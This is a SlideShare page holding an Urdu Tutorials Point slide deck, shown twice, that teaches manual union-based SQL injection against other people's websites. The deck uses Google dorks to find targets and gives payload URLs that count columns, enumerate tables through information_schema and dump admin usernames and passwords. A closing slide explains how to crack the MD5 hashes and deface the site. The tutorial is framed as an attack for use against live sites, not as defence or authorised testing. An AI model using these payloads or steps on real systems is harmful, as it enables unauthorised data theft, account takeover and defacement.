Al Zarqali, profile picture
Uploaded byAl Zarqali
PPTX, PDF1,548 views

Union based sql injection by Urdu Tutorials Point

The document outlines a tutorial on manual SQL injection techniques, including using Google dorks to find vulnerable sites and checking their vulnerability with SQL queries. It explains how to identify the number of columns, find vulnerable columns, and extract database information such as usernames and passwords. Additionally, it provides instructions for defacing websites and mentions resources for decrypting hashed passwords.

Downloaded 29 times
Union Based SQL Injection The Basic & First Stage of Manual SQL Injection.
Finding Vulnerable Sites  To Find Vulnerable Sites we use Google dorks.  Index.php?id= (Example of Google Dork)  Dorks???? Shared Along with this Tutorial.
Checking Vulnerability  In order to check the vulnerability of site we add the single quote (‘) at the end of url & hit enter.  Www.site.com/index.php?id=1’ if the page remains same it means it is not vuln, if it is showing any error which related to sql query, then it is vulnerable.
Finding Number of Columns  To find number of column in site’s database we replace quote(‘) with order by n statement.  Change the n from 1,2,3,4,……n Until you get the error like “Unknown Column”  If you get Unknown column on 6 number then 5 columns are there in database of site.
Finding Vulnerable Column  To find the vulnerable column we put (-) before ID number. Like index.php?id=-2  & also we replace order by statement with union select.After union select we type all the number of columns like site.com/index.php?id=-2 union select 1,2,3,4,5—  After it we will get a bold number on page
Finding Version, DB & user  Now in the last slide we found vulnerable column which was bold.  To find version ,database or user we replace vulnerable column.  Version()  Database()  User() if the above don’t work then user hex(@@version))
Finding Table Name  To find table names user the following statements.  Group_concat(table_name) information_schema.tables where table_schema=database()—  Replace group_concat(table_name) with vulnerable column number. & type the second query after total column numbers like site.com/index.php?id=-2 union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--
Dumping Admin Table  Group_concat(column_name) FROM information_schema.columns WHERE table_name=mysqlchar()—  Download & install hackbar in Mozilla Firefox https://addons.mozilla.org/en- US/firefox/addon/3899  Select sql>Mysql>MysqlChar()  Then a small window will open type admin table name like in mine case it is tbl_admin click ok. Copy & paste the Chars instead of mysqlchar()
Extracting Admin info  After hitting enter you will see admin username,passsword,id,type & many more columns on the page.  To Dump user name ,password replace group_concat(column_name) with group_concat(username,0x3a,password)  Replace information_schema…. Balah blah with just simple from admin table name like index.php?id=-2 union select 1,2,3,4,group_concat(username,0x3a,passwor d),6 from tbl_admin--
Extra Guideline  To deface site you should have to find admin page which will be like site.com/admin site.com/login.php etc etc  Before this you should have to decrypt md5 hashed password with online sites like md5online.org
 <3   Thanks for Watching I hope you have liked it  I am Always Available for live help on team viewer please contact me in any issue  Facebook.com/backk.sppac3  Facebook.com/UrduTutorialsPoint  Stay Connected <3 for More Tutorials

More Related Content

PPT
Les05
bySudharsan S
 
PPT
SQL Introduction to displaying data from multiple tables
byVibrant Technologies & Computers
 
PPTX
MULTIPLE TABLES
byASHABOOPATHY
 
PPT
Oracle sql joins
byredro
 
PPTX
MySQL JOIN & UNION
byJamshid Hashimi
 
PDF
Mysql cheatsheet
byAdolfo Nasol
 
PPTX
Oracle: Joins
byDataminingTools Inc
 
PDF
7. Using Sub Queries
byEvelyn Oluchukwu
 
Les05
bySudharsan S
 
SQL Introduction to displaying data from multiple tables
byVibrant Technologies & Computers
 
MULTIPLE TABLES
byASHABOOPATHY
 
Oracle sql joins
byredro
 
MySQL JOIN & UNION
byJamshid Hashimi
 
Mysql cheatsheet
byAdolfo Nasol
 
Oracle: Joins
byDataminingTools Inc
 
7. Using Sub Queries
byEvelyn Oluchukwu
 

What's hot

PPT
Displaying data from multiple tables
bySyed Zaid Irshad
 
PPTX
Sql modifying data - MYSQL part I
byAhmed Farag
 
ODP
Mysql database
bymayank78634
 
PPTX
MYSQL join
byAhmed Farag
 
PDF
RDBMS Lab03 applying constraints (UIU)
byMuhammad T Q Nafis
 
PPTX
SQL UNION
byRitwik Das
 
DOCX
Computing assignment 02 ms access (bilal maqbool 10) se-i
byBilal Maqbool ツ
 
PDF
A Brief Introduction About Sql Injection in PHP and MYSQL
bykobaitari
 
PPTX
How did i steal your database CSCamp2011
byMostafa Siraj
 
PPT
e computer notes - From multiple tables
byecomputernotes
 
DOC
Sql
bykrishna_v111
 
PDF
Sql select statement
byVivek Singh
 
PPTX
Oracle apps financial online training
bymagnifics
 
Displaying data from multiple tables
bySyed Zaid Irshad
 
Sql modifying data - MYSQL part I
byAhmed Farag
 
Mysql database
bymayank78634
 
MYSQL join
byAhmed Farag
 
RDBMS Lab03 applying constraints (UIU)
byMuhammad T Q Nafis
 
SQL UNION
byRitwik Das
 
Computing assignment 02 ms access (bilal maqbool 10) se-i
byBilal Maqbool ツ
 
A Brief Introduction About Sql Injection in PHP and MYSQL
bykobaitari
 
How did i steal your database CSCamp2011
byMostafa Siraj
 
e computer notes - From multiple tables
byecomputernotes
 
Sql
bykrishna_v111
 
Sql select statement
byVivek Singh
 
Oracle apps financial online training
bymagnifics
 

Viewers also liked

DOCX
Types of sql injection attacks
byRespa Peter
 
PDF
SQL Injection
byAbhinav Nair
 
PPTX
Sql Injection attacks and prevention
byhelloanand
 
PDF
Sql injection 幼幼班
byhugo lu
 
PPT
Blind SQL Injection - Optimization Techniques
byamiable_indian
 
PDF
Advanced SQL injection to operating system full control (slides)
byBernardo Damele A. G.
 
PPTX
Time-Based Blind SQL Injection
bymatt_presson
 
PPT
Sql injection
byPallavi Biswas
 
PDF
Practical Approach towards SQLi ppt
byAhamed Saleem
 
Types of sql injection attacks
byRespa Peter
 
SQL Injection
byAbhinav Nair
 
Sql Injection attacks and prevention
byhelloanand
 
Sql injection 幼幼班
byhugo lu
 
Blind SQL Injection - Optimization Techniques
byamiable_indian
 
Advanced SQL injection to operating system full control (slides)
byBernardo Damele A. G.
 
Time-Based Blind SQL Injection
bymatt_presson
 
Sql injection
byPallavi Biswas
 
Practical Approach towards SQLi ppt
byAhamed Saleem
 

Similar to Union based sql injection by Urdu Tutorials Point

PPT
SQL Injection
byAdhoura Academy
 
PDF
Sq li
byAshok kumar sandhyala
 
PPTX
Sql injection - security testing
byNapendra Singh
 
PPT
A Brief Introduction in SQL Injection
bySina Manavi
 
PPT
Sql Injection
bySanjeev Kumar Jaiswal
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
PPTX
Hacking Techniques
byIshaq Mohammed
 
PDF
Hacking Your Way To Better Security - php[tek] 2016
byColin O'Dell
 
PDF
32373 uploading-php-shell-through-sql-injection
byAttaporn Ninsuwan
 
PDF
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
DOCX
Sql full tutorial
byMozaaic Cyber Security
 
PPT
Sql injections
byManish Kushwaha
 
PPT
How to Hack Website using SQL Injection Attack
byCybrary Tech
 
PDF
Advanced SQL Injection: Attacks
byNuno Loureiro
 
PDF
Sql injection
byNa Ni
 
PPTX
Web hacking series part 3
byAditya Kamat
 
PPTX
Sql injection
byMathewHarrison3
 
PDF
Php Security - OWASP
byMizno Kruge
 
PPTX
Hacking Your Way to Better Security - ZendCon 2016
byColin O'Dell
 
PPTX
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
byColin O'Dell
 
SQL Injection
byAdhoura Academy
 
Sq li
byAshok kumar sandhyala
 
Sql injection - security testing
byNapendra Singh
 
A Brief Introduction in SQL Injection
bySina Manavi
 
Sql Injection
bySanjeev Kumar Jaiswal
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
Hacking Techniques
byIshaq Mohammed
 
Hacking Your Way To Better Security - php[tek] 2016
byColin O'Dell
 
32373 uploading-php-shell-through-sql-injection
byAttaporn Ninsuwan
 
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
Sql full tutorial
byMozaaic Cyber Security
 
Sql injections
byManish Kushwaha
 
How to Hack Website using SQL Injection Attack
byCybrary Tech
 
Advanced SQL Injection: Attacks
byNuno Loureiro
 
Sql injection
byNa Ni
 
Web hacking series part 3
byAditya Kamat
 
Sql injection
byMathewHarrison3
 
Php Security - OWASP
byMizno Kruge
 
Hacking Your Way to Better Security - ZendCon 2016
byColin O'Dell
 
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
byColin O'Dell
 

Recently uploaded

PDF
CIRCLES OF LIFE - MIKE SSENDIKWANAWA.pdf
byMIKE SSENDIKWANAWA
 
PDF
RELEVANCE OF A BOY'S NO-MIKE SSENDIKWANAWA.pdf
byMIKE SSENDIKWANAWA
 
PDF
The Elusive Ally-osaurus - Anuli Changa | FuturePMO 2025
byWellingtone
 
PDF
Off Is the New On: The Hidden Power of Disconnecting to Reconnect
byWorkLifeRewired
 
PDF
Gardening and mental health: Growmate edition
byGrowmate Organics
 
PPTX
Rated SPG Presentation Education Summit Balanga City.pptx
byBenchMarin
 
PPTX
Exploring 21st Century Skills through SWOT
byPriyalDarji1
 
PPTX
Wokplace Relationships Lateral Violence to Kindness All Nations Hope Network ...
bygriehl
 
PPT
65514093-Hazard-Map-Presentation.ppt, plan
bynelnex
 
PPTX
How to Prepare for and Survive a Power Outage
byBob Mayer
 
PPTX
How To Communicate with confidence in Life
byD09SayyedShahanawaz
 
CIRCLES OF LIFE - MIKE SSENDIKWANAWA.pdf
byMIKE SSENDIKWANAWA
 
RELEVANCE OF A BOY'S NO-MIKE SSENDIKWANAWA.pdf
byMIKE SSENDIKWANAWA
 
The Elusive Ally-osaurus - Anuli Changa | FuturePMO 2025
byWellingtone
 
Off Is the New On: The Hidden Power of Disconnecting to Reconnect
byWorkLifeRewired
 
Gardening and mental health: Growmate edition
byGrowmate Organics
 
Rated SPG Presentation Education Summit Balanga City.pptx
byBenchMarin
 
Exploring 21st Century Skills through SWOT
byPriyalDarji1
 
Wokplace Relationships Lateral Violence to Kindness All Nations Hope Network ...
bygriehl
 
65514093-Hazard-Map-Presentation.ppt, plan
bynelnex
 
How to Prepare for and Survive a Power Outage
byBob Mayer
 
How To Communicate with confidence in Life
byD09SayyedShahanawaz
 

Union based sql injection by Urdu Tutorials Point

  • 1.
    Union Based SQL Injection TheBasic & First Stage of Manual SQL Injection.
  • 2.
    Finding Vulnerable Sites To Find Vulnerable Sites we use Google dorks.  Index.php?id= (Example of Google Dork)  Dorks???? Shared Along with this Tutorial.
  • 3.
    Checking Vulnerability  Inorder to check the vulnerability of site we add the single quote (‘) at the end of url & hit enter.  Www.site.com/index.php?id=1’ if the page remains same it means it is not vuln, if it is showing any error which related to sql query, then it is vulnerable.
  • 4.
    Finding Number ofColumns  To find number of column in site’s database we replace quote(‘) with order by n statement.  Change the n from 1,2,3,4,……n Until you get the error like “Unknown Column”  If you get Unknown column on 6 number then 5 columns are there in database of site.
  • 5.
    Finding Vulnerable Column To find the vulnerable column we put (-) before ID number. Like index.php?id=-2  & also we replace order by statement with union select.After union select we type all the number of columns like site.com/index.php?id=-2 union select 1,2,3,4,5—  After it we will get a bold number on page
  • 6.
    Finding Version, DB& user  Now in the last slide we found vulnerable column which was bold.  To find version ,database or user we replace vulnerable column.  Version()  Database()  User() if the above don’t work then user hex(@@version))
  • 7.
    Finding Table Name To find table names user the following statements.  Group_concat(table_name) information_schema.tables where table_schema=database()—  Replace group_concat(table_name) with vulnerable column number. & type the second query after total column numbers like site.com/index.php?id=-2 union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--
  • 8.
    Dumping Admin Table Group_concat(column_name) FROM information_schema.columns WHERE table_name=mysqlchar()—  Download & install hackbar in Mozilla Firefox https://addons.mozilla.org/en- US/firefox/addon/3899  Select sql>Mysql>MysqlChar()  Then a small window will open type admin table name like in mine case it is tbl_admin click ok. Copy & paste the Chars instead of mysqlchar()
  • 9.
    Extracting Admin info After hitting enter you will see admin username,passsword,id,type & many more columns on the page.  To Dump user name ,password replace group_concat(column_name) with group_concat(username,0x3a,password)  Replace information_schema…. Balah blah with just simple from admin table name like index.php?id=-2 union select 1,2,3,4,group_concat(username,0x3a,passwor d),6 from tbl_admin--
  • 10.
    Extra Guideline  Todeface site you should have to find admin page which will be like site.com/admin site.com/login.php etc etc  Before this you should have to decrypt md5 hashed password with online sites like md5online.org
  • 11.
     <3  Thanks for Watching I hope you have liked it  I am Always Available for live help on team viewer please contact me in any issue  Facebook.com/backk.sppac3  Facebook.com/UrduTutorialsPoint  Stay Connected <3 for More Tutorials